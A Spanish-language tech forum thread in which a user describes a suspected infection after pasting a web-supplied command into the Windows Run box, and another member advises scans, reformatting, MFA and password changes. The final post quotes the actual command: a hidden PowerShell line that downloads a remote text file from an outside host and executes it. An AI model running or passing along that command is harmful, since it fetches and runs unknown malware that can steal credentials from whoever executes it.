Resultados 1 al 6 de 6

Tema: Tengo sospecha de una infección

  1. #1
    Master
    Ubicación
    En la capital del Jerte....
    Mensajes
    1,308

    Predeterminado Tengo sospecha de una infección

    Buenos días. A ver cómo explico lo que me ha pasado.
    El otro día creo que he agregado una línea de comando al registro de windows y no sé si he metido la pata o no, por lo cual ando con pies de plomo con el equipo.
    Con las prisas de lo que estaba haciendo, seguí instrucciones de una página web y desde entonces han sucedido expedientes X en mi equipo: Chrome no se abre, firefox ha cambiado de aspecto y me llegó un mensaje de google de que alguien había intentado suplantar mi identidad en google, pero que le habían bloqueado.
    Busqué para pasar un antivirus online y el primero que me apareció fue el McAfee. Hice una revisión online y me indicó que había ¡5 virus!. Me dice que reinicie el equipo y al hacerlo, me están todo el rato saliendo notificaciones de que mi equipo está infectado, que alguien intenta descargar en mi equipo..... curiosamente si pinchaba me llevaba a una página web que me decía que comprara McAfee.
    Bueno, he restaurado sistema a un punto anterior y los dichosos mensajes han desaparecido pero, mi pregunta es: ¿la supuesta línea de código que puedo haber introducido en el registro también desaparece al haber restaurado sistema? ¿Puede estar residente en memoria o haberse instalado en el arranque y darme por saco?
    Espero haberme expresado bien, a ver si alguien puede arrojarme un poco de luz.
    Salu222
    .... Para algunos, la vida es galopar un camino empedrado de horas minutos y segundos.
    Yo, más humilde soy, y sólo quiero que la ola que surge del último suspiro de un segundo
    me transporte mecido hasta el siguiente....

  2. #2
    Master Avatar de tuoni
    Ubicación
    Capital del corredor
    Mensajes
    2,273

    Predeterminado Re: Tengo sospecha de una infección

    Pues de momento:

    -Si puedes indicar lo que has puesto en el CMD sería esclarecedor
    -Saca toda tu info importante y formatea
    -Si, se supone que cuando restauras sistema se pone como estaba en ese momento
    -Busca un software como MalwareBytes o similar y si quieres, un antivirus que tenga una cierta relevancia (Norton/McAfee por mi, ni en pintura)


    Hay que tener mucho cuidado con lo que uno mete "a capón" al sistema...no es la primera vez que lo veo y luego pasan estas cosas (no te puedes ni imaginar en pequeñas empresas las liadas que he visto...)


    Como dato extra, activa en todo lo que puedas MFA (doble factor) y cambia tus contraseñas


    PD: siento la turra de "señor" mayor
    2*Xeon 2690V4 2.6@3.2 + 64gb DDR4 2400mhz - NEW Gigabyte 2080TI Xtreme - Crucial M.2 Nvme 2tb (SO) + Crucial 1TB (JUEGOS) - Controladora PCIE RAID 0 (5xCrucial 250gb m.2 SATA (1.2TB)) - Corsair RM850 2022 - Dell S3222DGM QHD 1440p 165hz -Windows 10 Pro x64 - NEW Keychron V1 MAX QMK !!!

  3. #3
    Master
    Ubicación
    En la capital del Jerte....
    Mensajes
    1,308

    Predeterminado Re: Tengo sospecha de una infección

    Muchas gracias por contestar.
    Te comento: no fue a través de CMD, fue a través de la ventana "TECLA WINDOWS + R". Copié y pegué, fue tan rápido e iba con tanta prisa que no tengo ni idea de lo que pegué. Y no sé si conseguiré encontrarlo, pero puedo probar.
    En principio quisiera no tener que formatear. Ayer por la noche pasé el MALWAREBYTES y no encontró ningún archivo fraudulento, pero prefiero asegurar.
    Con lo cual, ¿tienes alguna opinión con la nueva información?
    Gracias
    .... Para algunos, la vida es galopar un camino empedrado de horas minutos y segundos.
    Yo, más humilde soy, y sólo quiero que la ola que surge del último suspiro de un segundo
    me transporte mecido hasta el siguiente....

  4. #4
    Master Avatar de tuoni
    Ubicación
    Capital del corredor
    Mensajes
    2,273

    Predeterminado Re: Tengo sospecha de una infección

    Pues si no sabes que pegaste, chungo la verdad......

    Yo probaría algún trial de BitDefender Total Security o similar y asegurarme de que no hay nada de nada, aunque me remito a lo dicho anteriormente, yo ya hubiera formateado, no me fiaría un sistema en el que me ha pasado "ese espectáculo" jejeje

    PD: yo de hecho es posible que me pille el Bitdefender Total, sale por "2 duros" 1 año y 5 dispositivos (win, mac y movil)...uno se gasta más pasta en unas cañas que en su propia seguridad
    2*Xeon 2690V4 2.6@3.2 + 64gb DDR4 2400mhz - NEW Gigabyte 2080TI Xtreme - Crucial M.2 Nvme 2tb (SO) + Crucial 1TB (JUEGOS) - Controladora PCIE RAID 0 (5xCrucial 250gb m.2 SATA (1.2TB)) - Corsair RM850 2022 - Dell S3222DGM QHD 1440p 165hz -Windows 10 Pro x64 - NEW Keychron V1 MAX QMK !!!

  5. #5
    Master
    Ubicación
    En la capital del Jerte....
    Mensajes
    1,308

    Predeterminado Re: Tengo sospecha de una infección

    Oks, me plantearé el formateo. De todas formas, revisando mi actividad de Google, la verdad es que la conexión solo ha sido una vez, y al parecer ocurrió desde el ordenador del curro y a las 2.15 AM. Reviso la actividad pero no vuelve a indicarme nada. Ya te comento por curiosidad, para que conozcas el tema. Probaré con Bitdefender y algún otro antivirus.
    Salu222 y gracias por el interés.
    .... Para algunos, la vida es galopar un camino empedrado de horas minutos y segundos.
    Yo, más humilde soy, y sólo quiero que la ola que surge del último suspiro de un segundo
    me transporte mecido hasta el siguiente....

  6. #6
    Master
    Ubicación
    En la capital del Jerte....
    Mensajes
    1,308

    Predeterminado Re: Tengo sospecha de una infección

    Actualizo tema:
    Si no me equivoco, este es el texto que pegué en la ventana "Tecla Windows + R":
    powershell.exe -W Hidden -command $url = 'https://finalstepgo.com/uploads/il4.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text

    ¿Qué os parece? A ver, por ahora no he formateado por no andar con la historia de reinstalar windows ni programas, por ahora he reinstalado firefox y me funciona todo normal. No hay intento de acceso a cuenta ni nada por el estilo.
    ¿Qué os parece la cadena de texto que he copiado en el post?
    Gracias y un saludo.
    .... Para algunos, la vida es galopar un camino empedrado de horas minutos y segundos.
    Yo, más humilde soy, y sólo quiero que la ola que surge del último suspiro de un segundo
    me transporte mecido hasta el siguiente....

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •